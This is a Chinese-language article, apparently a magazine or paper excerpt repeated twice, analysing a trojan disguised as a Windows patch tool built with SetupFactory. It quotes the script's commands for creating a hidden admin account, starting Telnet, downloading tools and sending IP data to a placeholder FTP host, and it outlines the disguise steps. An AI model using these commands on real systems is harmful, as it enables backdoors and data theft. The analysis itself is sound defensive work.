论文部分内容阅读
在以病毒为首的恶意程序家族中,木马是非常阴险的“品种”。木马潜入系统后,一般不会对系统进行明显的破坏,而是使出各种手段,千方百计地隐藏自己,之后悄悄开启后门,为黑客的顺利入侵铺平道路。可以说,木马对系统的安全威胁极大。正因为如此,木马也就成了人人喊打的过街老鼠,成了杀毒软件防御的重点目标。黑客为了提高木马的危害力,通常会使用五花八门的免杀技术,让木马逃过追捕。不过魔高一尺道高一丈,免杀木马终究难逃法网。不过,狡猾的黑客又想出了狠招,通过将原本合法的系统程序“巧妙”组合成了新型木马,从而轻松避开杀软的监控,堂而皇之地潜入系统。这不,某单位的网管小金就遭遇到了这类新型组合式木马,欲知详情,请看下文!
网站被黑客入侵了!
小金为了提高系统安全性,就从网上随手下载了一个修复系统漏洞的软件。运行该软件(其名称为“Winpatch.exe”)后,出现了修复系统漏洞的提示信息,并从网上下载了一些补丁包,之后为系统逐一打上补丁。不过过了几天,小金发现网站被黑客入侵了,不仅网站被乱改了一通,而且丢失了一些重要数据。看来,这台主机已经被黑客盯上了。小金立刻升级杀软病毒库,对系统进行全局扫描,却并没有发现病毒和木马的踪迹。小金又更换了几款功能很强的杀软,也没有发现任何问题!
谁打开了Telnet登录通道?
小金打开了任务管理器,并没有发现任何可疑进程信息。随手在CMD窗口中执行“netstat-an”命令,却奇怪地发现了23号端口出于开启状态,该端口是Telnet服务专用的。可是自己并没有开肩Telnet服务啊?肯定是黑客非法开启了本机的Telnet服务,远程登录到本机上,继而执行各种破坏操作的。没有管理员级别的账户名和密码,黑客即使打开了Telnet通道,也无法连接。
找出暗藏的黑客账户
果然,小金运行了“net user”命令,发现存在一个可疑的“hawke7”账户。运行“net user hawke7”命令,观察其属性,发现这是一个具有管理员权限的账户,而且不久前还登录过本机。小金立即删除了这个非法账户,同时关闭了Telnet服务。因为自己并不需要Telnet服务,为了安全起见,小金还删除了与之关联的“tlntsvr.exe”文件,之后重启系统,小金觉得这回就可以截断黑客入侵的通道了。不过,过了一阵子,小金再次操作本机时,发现Telnet服务重新被打开了,非法账户又重新出现了。这究竟是怎么回事呢?
潜伏在启动项中的“不速之客”
小金运行了“maconfig.exe”程序,对启动项进行了仔细查看,果然发现了一个奇怪的程序“t_net.exe”,该程序位于“C:\Windows\System32”文件夹,使用Ultraedit查看其内容,发现实际上和之前提到“Winpatch.exe”是完全一样的,只是更换了名称而已。之前以为该程序是修复漏洞的工具,没有太在意。现在仔细分析,发现了疑点,该程序为何跑到了让人敏感的系统路径中了呢?又为何添加到了启动项里来了呢?莫非这个程序有问题,不过杀软并没有提示该程序有问题啊!为了便于观察,小金重新删除了Telnet服务和可疑账户,同时重新开机,并暂时切断了本机的网络连接。果然,经过一段时间,Telnet服务没有开启,可疑账户也没有出现。小金打开了CMD窗口,运行了“at”命令,检查有没有可疑计划任务。
嗅探分析,发现端倪
果然,发现了一条和“t_net.exe”相关的定时任务,设定在开机后一个小时启动“t_net.exe”程序。小金决定对该程序进行简单测试。为了避免Telnet服务被自动打开,小金删除了系统路径下的“tlntsvr。exe”“ftp.exe”“net.exe”等常被非法利用的程序。重新连入网络后,小金启动了网络嗅探器,对进出的数据进行监控,之后手工运行这个“t_net.exe”,其活动情况果然被嗅探器追踪到了。分析捕获的网络数据,小金发现该程序从某个网址下载了“tlntsvr.exe”“ftp.exe”程序,同时将本机的IP传送到这个来历不明的FTP存储空间巾。之后检查系统,发现上述可疑账户又出现了,Telnet服务也打开了。看来,的确是这个号称是系统漏洞修复程序对系统伸出了黑手。
让木马程序现出“原型”
通过对“WinPatch.exe”程序进行一番深入分析,小金终于搞清了其中的“猫腻”,并且发现了一种鲜为人知的木马技术。原来,这个“WinPatch.exe”程序并不是什么系统漏洞修复工具,而是黑客精心制作的一个特殊的木马。说它特殊,指的是其和其它木马有很大的不同点,一般的木马都是设计者使用专业的开发工具制作出来的,虽然功能强悍,不过活动起来也比较扎眼,容易成为杀软的攻击目标。而这个木马却没有被刻意设计,拥有什么狡诈的功能,而是另辟蹊径将常见的系统T具“灵活”地组合起来加以运用,利用合法的手段为黑客开启入侵之门。
探寻神秘木马身份来源
“WinPatch.exe”程序实际上是利用SetupFactory这款专门设计安装程序的工具制作出来的。我们知道,SetupFactory是一款功能强悍的安装程序设计软件,其强大之处在于可以让开发者根据实际需要,编写复杂的脚本程序,对系统进行各种设置操作,例如创建文件、修改注册表、访问网络等等。但是,在黑客眼里,SetupFactory却成了制作木马的得力工具。黑客先设计好了一个脚本程序,当然,这个脚本也不是完全用来攻击系统的,为了掩入耳目,黑客在脚本中专门编写了相关的代码,作用是从网上下载系统各种补丁包,并执行安装操作,给人以这是一个维护系统安全的好软件的假象。注意,在不同版本的SetupFactory中,脚本程序的后缀是不同的,例如在SetupFactory 6.0中,其后缀为“.sf6”。
探秘黑客脚本文件 通过对该“Winpatch.exe”进行反编译,得到了其脚本文件,借此可以比较深入地了解其入侵伎俩。为了便于大家洞悉其内情,笔者将该脚本传送到了网上,打开网址“http://www.dwz.cn/tWD9G”,可以了解其内容。例如在Setup Factory 6.0中点击菜单“File→Open”项,导入该脚本文件(后缀为“.sf6”)。在Setup Factory主界面左侧的“Design”栏中点击“Actions”按钮,在弹出窗口的“Startup”面板中可以显示其脚本内容(如图1),我们知道,放在该面板中的脚本可以在主程序文件运行之前抢先运行,这样黑客预设的恶意脚本就会自动激活。
分析木马初次运行时的活动特点
该黑客脚本程序实际上分为两部分,第一部分主要功能是通过对注册表启动键值进行写操作,并判断本程序是否是第一次运行(如图2)如果是的话就将制作好的安装程序(也就是本文提到的“WinPatch.exe”)复制到系统路径中的“System32”文件夹,并更名为“t_net.exe”。同时对注册表中的启动项进行修改,将黑客程序“t-net.exe”写入到启动项中,这样可以让其每次启动时自动运行。接着该脚本会判断以何种形式打开Telnet服务,并在系统路径下创建名为“telnet.ini”的文件,里面包含TelnPt服务的启动模式值,例如“mode=4”等。为了防止本机没有“tlntsvr.exe”程序,造成无法开启Telnet服务的情况,该脚本还会自动搜索“tlntsvr.exe”程序文件,如果没有发现该文件,就从预设的网址下载该文件,并复制到系统路径中。当然,该下载网址是黑客预先准备好的。“tlntsvr.exe”程序是与Telnet服务器关联的主程序,没有该程序,就无法开启Telnet服务。
洞悉木马的渗透流程
该黑客脚本的第二部分主要功能是开启Telnet服务,创建黑客账户,以及将本机IP发送出去。具体流程是当再次运行“t_net.exe”程序时,该程序就会根据读取的Telnet服务启动模式值,并根据该值执行对应的语句,例如当Mode值为l、2、3、4等数值时,分别执行对应的语句块,利用“cmd/c net start tlntsvr”指令以及修改注册表对应键值,来直接开启Telnet服务(如图3)。当Telnet后门打开后,为了便于入侵,黑客使用了“Execute (net user hawke7 1234 /add)”和“Execute, (net localgroup administrators hawke7 /add)”语句,执行了创建名称为“hawke7”,密码为“1234”的管理员账户,为黑客入侵打开了大门。黑客为了顺利入侵,会先判断本机是否上网,如果没有上网,就开启Task Schedule服务,并设置一个计划任务,目的是延迟1小时启动该黑客程序,没有的话则继续执行延时任务(如图4)。这样,只要该机一旦上网,黑客就可以对该机进行入侵了。
发送被控机lP信息,为黑客入侵打开大门
之后黑客通过“Execute (cmd/c ipconfig /all>c:\ip.txt)”指令获得本机的IP信息,并将IP信息写入指定的TXT文件中,接着在“Write to Text File ("username password type binary send c:\telnet_o/oRegOwner%.txt bye”t”指令中将FTP各参数设置完毕,其中“username”为黑客使用的FTP账户名,“password”为连接密码,采用二进制传输方式,并将包含IP信息的文件使用“send”指令发送。这些FTP指令信息全部保存在“logftp.txt”文件中。如果本机不存在“ftp.exe”程序,黑客就会通过“HTTP Download (http://www.xxx.com/ftp.exe->a/oSysDir%)”指令,从预设的网址下载(这里的“xxx”表示具体的网址),并将下载的“ftp.exe”文件存放到系统路径中。一切准备完成后,就使用“Execute (ftp-s:c:\logftp.txt ftp.xxx.com)”指令,将本机IP信息发送到黑客预设的FTP空间中。
在最后,该黑客脚本将所有的痕迹文件全部删除,让用户无法发现其踪迹。黑客只需登录自己的FTP空间,得到目标主机的IP后,就可以预设的黑客账户,使用Telnet远程登录到被控机中随心所欲地执行各种指令,传输各种黑客文件,安装更高级的后门,对系统进行深度入侵了。
该组合式木马的特点分析
经过该新型木马的深入分析,可以看到,为了让木马活动得更加隐蔽,黑客在Setupfactory中对安装工程项目的属性进行了修改,启用了隐蔽运行功能并删除了有关的安装提示窗口。例如,在Setupfactory主界面左侧点击“General Design”按钮,在右侧窗口(如图5)的“Product Info”面板中填入虚假的产品信息,例如“Windows系统严重漏洞补丁”等来迷惑用户。在“Settings”面板(如图6)中勾选“Run setup insilent mode“项,激活隐蔽运行模式。在窗口左侧点击“Screens”按钮,在弹出窗口中删除所有窗口信息。这样,当该木马运行后,起到了狡猾的伪装效果,让用户很难察觉得到其活动情况。之后在Setupfactory中点击F7键执行编译操作,就产生了功能独特的木马。黑客再为其更换一个看似正常的图标,为其更换一个诱人的名称,然后将其放到网上等待不明真相的用户上钩就行了。当然,黑客还可以将其和正常的软件捆绑在一起,这样其迷惑性就更大了。当用户中招后运行该木马,就会自动为黑客打开入侵通道。根据以上分析,可以看出,该木马没有使用什么复杂高深的技术,只是简单地将系统常用的“ftp.exe”和“tlntsvr.exe”程序组合起来使用而已,利用Setupfactory这款看似普通的安装开发工具,结合设计周密的脚本程序,让木马披上合法的外衣,悄无声息打开了非法入侵的大门。同时,因为所涉及的都是合法程序,杀软再厉害也对其无可奈何,自然无法发现木马的踪迹了。
总结经验,避开木马陷阱
根据以上判断,小金吸取了教训——不能图省事从网上随便下载来历不明的程序,而是应该从正规的网站下载。了解了该木马的伎俩后,小金将启动项中与“WinPatch.exe”关联的项目删除,同时将“WinPatch.exe”彻底删除,之后将Telnet服务关闭,将非法账户清除。经过一番操作,彻底切断了黑客入侵的通道。
网站被黑客入侵了!
小金为了提高系统安全性,就从网上随手下载了一个修复系统漏洞的软件。运行该软件(其名称为“Winpatch.exe”)后,出现了修复系统漏洞的提示信息,并从网上下载了一些补丁包,之后为系统逐一打上补丁。不过过了几天,小金发现网站被黑客入侵了,不仅网站被乱改了一通,而且丢失了一些重要数据。看来,这台主机已经被黑客盯上了。小金立刻升级杀软病毒库,对系统进行全局扫描,却并没有发现病毒和木马的踪迹。小金又更换了几款功能很强的杀软,也没有发现任何问题!
谁打开了Telnet登录通道?
小金打开了任务管理器,并没有发现任何可疑进程信息。随手在CMD窗口中执行“netstat-an”命令,却奇怪地发现了23号端口出于开启状态,该端口是Telnet服务专用的。可是自己并没有开肩Telnet服务啊?肯定是黑客非法开启了本机的Telnet服务,远程登录到本机上,继而执行各种破坏操作的。没有管理员级别的账户名和密码,黑客即使打开了Telnet通道,也无法连接。
找出暗藏的黑客账户
果然,小金运行了“net user”命令,发现存在一个可疑的“hawke7”账户。运行“net user hawke7”命令,观察其属性,发现这是一个具有管理员权限的账户,而且不久前还登录过本机。小金立即删除了这个非法账户,同时关闭了Telnet服务。因为自己并不需要Telnet服务,为了安全起见,小金还删除了与之关联的“tlntsvr.exe”文件,之后重启系统,小金觉得这回就可以截断黑客入侵的通道了。不过,过了一阵子,小金再次操作本机时,发现Telnet服务重新被打开了,非法账户又重新出现了。这究竟是怎么回事呢?
潜伏在启动项中的“不速之客”
小金运行了“maconfig.exe”程序,对启动项进行了仔细查看,果然发现了一个奇怪的程序“t_net.exe”,该程序位于“C:\Windows\System32”文件夹,使用Ultraedit查看其内容,发现实际上和之前提到“Winpatch.exe”是完全一样的,只是更换了名称而已。之前以为该程序是修复漏洞的工具,没有太在意。现在仔细分析,发现了疑点,该程序为何跑到了让人敏感的系统路径中了呢?又为何添加到了启动项里来了呢?莫非这个程序有问题,不过杀软并没有提示该程序有问题啊!为了便于观察,小金重新删除了Telnet服务和可疑账户,同时重新开机,并暂时切断了本机的网络连接。果然,经过一段时间,Telnet服务没有开启,可疑账户也没有出现。小金打开了CMD窗口,运行了“at”命令,检查有没有可疑计划任务。
嗅探分析,发现端倪
果然,发现了一条和“t_net.exe”相关的定时任务,设定在开机后一个小时启动“t_net.exe”程序。小金决定对该程序进行简单测试。为了避免Telnet服务被自动打开,小金删除了系统路径下的“tlntsvr。exe”“ftp.exe”“net.exe”等常被非法利用的程序。重新连入网络后,小金启动了网络嗅探器,对进出的数据进行监控,之后手工运行这个“t_net.exe”,其活动情况果然被嗅探器追踪到了。分析捕获的网络数据,小金发现该程序从某个网址下载了“tlntsvr.exe”“ftp.exe”程序,同时将本机的IP传送到这个来历不明的FTP存储空间巾。之后检查系统,发现上述可疑账户又出现了,Telnet服务也打开了。看来,的确是这个号称是系统漏洞修复程序对系统伸出了黑手。
让木马程序现出“原型”
通过对“WinPatch.exe”程序进行一番深入分析,小金终于搞清了其中的“猫腻”,并且发现了一种鲜为人知的木马技术。原来,这个“WinPatch.exe”程序并不是什么系统漏洞修复工具,而是黑客精心制作的一个特殊的木马。说它特殊,指的是其和其它木马有很大的不同点,一般的木马都是设计者使用专业的开发工具制作出来的,虽然功能强悍,不过活动起来也比较扎眼,容易成为杀软的攻击目标。而这个木马却没有被刻意设计,拥有什么狡诈的功能,而是另辟蹊径将常见的系统T具“灵活”地组合起来加以运用,利用合法的手段为黑客开启入侵之门。
探寻神秘木马身份来源
“WinPatch.exe”程序实际上是利用SetupFactory这款专门设计安装程序的工具制作出来的。我们知道,SetupFactory是一款功能强悍的安装程序设计软件,其强大之处在于可以让开发者根据实际需要,编写复杂的脚本程序,对系统进行各种设置操作,例如创建文件、修改注册表、访问网络等等。但是,在黑客眼里,SetupFactory却成了制作木马的得力工具。黑客先设计好了一个脚本程序,当然,这个脚本也不是完全用来攻击系统的,为了掩入耳目,黑客在脚本中专门编写了相关的代码,作用是从网上下载系统各种补丁包,并执行安装操作,给人以这是一个维护系统安全的好软件的假象。注意,在不同版本的SetupFactory中,脚本程序的后缀是不同的,例如在SetupFactory 6.0中,其后缀为“.sf6”。
探秘黑客脚本文件 通过对该“Winpatch.exe”进行反编译,得到了其脚本文件,借此可以比较深入地了解其入侵伎俩。为了便于大家洞悉其内情,笔者将该脚本传送到了网上,打开网址“http://www.dwz.cn/tWD9G”,可以了解其内容。例如在Setup Factory 6.0中点击菜单“File→Open”项,导入该脚本文件(后缀为“.sf6”)。在Setup Factory主界面左侧的“Design”栏中点击“Actions”按钮,在弹出窗口的“Startup”面板中可以显示其脚本内容(如图1),我们知道,放在该面板中的脚本可以在主程序文件运行之前抢先运行,这样黑客预设的恶意脚本就会自动激活。
分析木马初次运行时的活动特点
该黑客脚本程序实际上分为两部分,第一部分主要功能是通过对注册表启动键值进行写操作,并判断本程序是否是第一次运行(如图2)如果是的话就将制作好的安装程序(也就是本文提到的“WinPatch.exe”)复制到系统路径中的“System32”文件夹,并更名为“t_net.exe”。同时对注册表中的启动项进行修改,将黑客程序“t-net.exe”写入到启动项中,这样可以让其每次启动时自动运行。接着该脚本会判断以何种形式打开Telnet服务,并在系统路径下创建名为“telnet.ini”的文件,里面包含TelnPt服务的启动模式值,例如“mode=4”等。为了防止本机没有“tlntsvr.exe”程序,造成无法开启Telnet服务的情况,该脚本还会自动搜索“tlntsvr.exe”程序文件,如果没有发现该文件,就从预设的网址下载该文件,并复制到系统路径中。当然,该下载网址是黑客预先准备好的。“tlntsvr.exe”程序是与Telnet服务器关联的主程序,没有该程序,就无法开启Telnet服务。
洞悉木马的渗透流程
该黑客脚本的第二部分主要功能是开启Telnet服务,创建黑客账户,以及将本机IP发送出去。具体流程是当再次运行“t_net.exe”程序时,该程序就会根据读取的Telnet服务启动模式值,并根据该值执行对应的语句,例如当Mode值为l、2、3、4等数值时,分别执行对应的语句块,利用“cmd/c net start tlntsvr”指令以及修改注册表对应键值,来直接开启Telnet服务(如图3)。当Telnet后门打开后,为了便于入侵,黑客使用了“Execute (net user hawke7 1234 /add)”和“Execute, (net localgroup administrators hawke7 /add)”语句,执行了创建名称为“hawke7”,密码为“1234”的管理员账户,为黑客入侵打开了大门。黑客为了顺利入侵,会先判断本机是否上网,如果没有上网,就开启Task Schedule服务,并设置一个计划任务,目的是延迟1小时启动该黑客程序,没有的话则继续执行延时任务(如图4)。这样,只要该机一旦上网,黑客就可以对该机进行入侵了。
发送被控机lP信息,为黑客入侵打开大门
之后黑客通过“Execute (cmd/c ipconfig /all>c:\ip.txt)”指令获得本机的IP信息,并将IP信息写入指定的TXT文件中,接着在“Write to Text File ("username password type binary send c:\telnet_o/oRegOwner%.txt bye”t”指令中将FTP各参数设置完毕,其中“username”为黑客使用的FTP账户名,“password”为连接密码,采用二进制传输方式,并将包含IP信息的文件使用“send”指令发送。这些FTP指令信息全部保存在“logftp.txt”文件中。如果本机不存在“ftp.exe”程序,黑客就会通过“HTTP Download (http://www.xxx.com/ftp.exe->a/oSysDir%)”指令,从预设的网址下载(这里的“xxx”表示具体的网址),并将下载的“ftp.exe”文件存放到系统路径中。一切准备完成后,就使用“Execute (ftp-s:c:\logftp.txt ftp.xxx.com)”指令,将本机IP信息发送到黑客预设的FTP空间中。
在最后,该黑客脚本将所有的痕迹文件全部删除,让用户无法发现其踪迹。黑客只需登录自己的FTP空间,得到目标主机的IP后,就可以预设的黑客账户,使用Telnet远程登录到被控机中随心所欲地执行各种指令,传输各种黑客文件,安装更高级的后门,对系统进行深度入侵了。
该组合式木马的特点分析
经过该新型木马的深入分析,可以看到,为了让木马活动得更加隐蔽,黑客在Setupfactory中对安装工程项目的属性进行了修改,启用了隐蔽运行功能并删除了有关的安装提示窗口。例如,在Setupfactory主界面左侧点击“General Design”按钮,在右侧窗口(如图5)的“Product Info”面板中填入虚假的产品信息,例如“Windows系统严重漏洞补丁”等来迷惑用户。在“Settings”面板(如图6)中勾选“Run setup insilent mode“项,激活隐蔽运行模式。在窗口左侧点击“Screens”按钮,在弹出窗口中删除所有窗口信息。这样,当该木马运行后,起到了狡猾的伪装效果,让用户很难察觉得到其活动情况。之后在Setupfactory中点击F7键执行编译操作,就产生了功能独特的木马。黑客再为其更换一个看似正常的图标,为其更换一个诱人的名称,然后将其放到网上等待不明真相的用户上钩就行了。当然,黑客还可以将其和正常的软件捆绑在一起,这样其迷惑性就更大了。当用户中招后运行该木马,就会自动为黑客打开入侵通道。根据以上分析,可以看出,该木马没有使用什么复杂高深的技术,只是简单地将系统常用的“ftp.exe”和“tlntsvr.exe”程序组合起来使用而已,利用Setupfactory这款看似普通的安装开发工具,结合设计周密的脚本程序,让木马披上合法的外衣,悄无声息打开了非法入侵的大门。同时,因为所涉及的都是合法程序,杀软再厉害也对其无可奈何,自然无法发现木马的踪迹了。
总结经验,避开木马陷阱
根据以上判断,小金吸取了教训——不能图省事从网上随便下载来历不明的程序,而是应该从正规的网站下载。了解了该木马的伎俩后,小金将启动项中与“WinPatch.exe”关联的项目删除,同时将“WinPatch.exe”彻底删除,之后将Telnet服务关闭,将非法账户清除。经过一番操作,彻底切断了黑客入侵的通道。